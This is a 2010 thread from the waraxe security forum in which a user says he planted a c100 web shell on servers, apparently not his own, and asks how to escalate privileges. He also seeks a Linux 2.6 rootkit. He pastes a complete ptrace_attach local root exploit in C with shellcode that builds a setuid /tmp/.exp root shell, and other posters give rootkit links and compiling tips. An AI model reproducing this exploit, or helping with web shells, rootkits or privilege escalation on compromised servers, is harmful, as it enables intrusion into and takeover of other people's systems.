Waraxe IT Security Portal
Login or Register
November 21, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 149
Members: 0
Total: 149
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Shell commands injection -> Now what?
Post new topicReply to topic View previous topic :: View next topic
Now what?
PostPosted: Sun Jan 10, 2010 9:13 am Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




Hi Wink

These days I uploaded c100 on some servers... but there are directories which aren't editable by me. So my question is: how to escalate my privilegies or login as another user?

Please give more details, cause I'm not very good in working with unix systems...
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 10:44 am Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




does anyone have rootkit for 2.6.x linux kernel?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 2:35 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Quote:
Please give more details, cause I'm not very good in working with unix systems...


+

Quote:
does anyone have rootkit for 2.6.x linux kernel?


Малко тъпо,нали?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 2:40 pm Reply with quote
vince213333
Advanced user
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Maybe he's a fast learner, pexli Wink
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 3:18 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




е не, защо да е тъпо? този, който имам нещо не иска да се компилира и за това си търся друг Wink Можеш ли да помогнеш?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 3:34 pm Reply with quote
vince213333
Advanced user
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Code:
http://www.enye-sec.org/en/programs.html


3rd one in the list.

Or

Code:
http://seclists.org/dailydave/2008/q3/215


I hope it helps Confused
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 3:36 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




well, I found one, compiled it and tried to run it, but I suppose I didn't do that correct.

Code:

/*
ptrace_attach privilege escalation exploit by s0m3b0dy

[*] tested on Gentoo 2.6.29rc1

grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...

email: s0m3b0dy1 (at) gmail.com
*/

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
unsigned long orig_eax, eip;
unsigned short cs, __cs;
unsigned long eflags, esp;
unsigned short ss, __ss;
};

main()
{
struct user_regs_struct322 regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd"; // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
printf("\n[-] read registers\n");
exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
printf("\n[-] write shellcode\n");
exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}


When I run it I get this output:

Quote:

Usage: gpasswd [-r|-R] group
gpasswd [-a user] group
gpasswd [-d user] group
gpasswd [-A user,...] [-M user,...] group

[-] Attach


I guess gpasswd is some suid file(I have to give the path to it??). But what are the other parameters? How should I run this exploit correcetly?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 6:52 pm Reply with quote
gat3way
Regular user
Regular user
Joined: Dec 11, 2008
Posts: 5




Quote:
http://www.enye-sec.org/en/programs.html


Много интересно...
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 7:13 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




Vince, do you have any idea how to compile the exploit, that you suggested?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 7:23 pm Reply with quote
vince213333
Advanced user
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




gat3way wrote:
Quote:
http://www.enye-sec.org/en/programs.html


Много интересно...


Randomly googled Smile

And AIR_Nayden, it seems like C code to me. Based on the use of structures and -1 instead of the boolean "false" etc... Though I don't know that much of this kind of exploits.

Maybe use the programm gcc and try
Code:
gcc -c exploit.c -o nameOfExploitAfterCompiling


I'm just guessing though, there are people on here who know much more of this than I do Confused
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 7:29 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




but which filename should I write? THere is more than one .c file Sad
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 7:32 pm Reply with quote
vince213333
Advanced user
Advanced user
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Try looking for the file with the "main" function in it. That's usually the function that is executed first in C.
View user's profile Send private message
Now what?
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds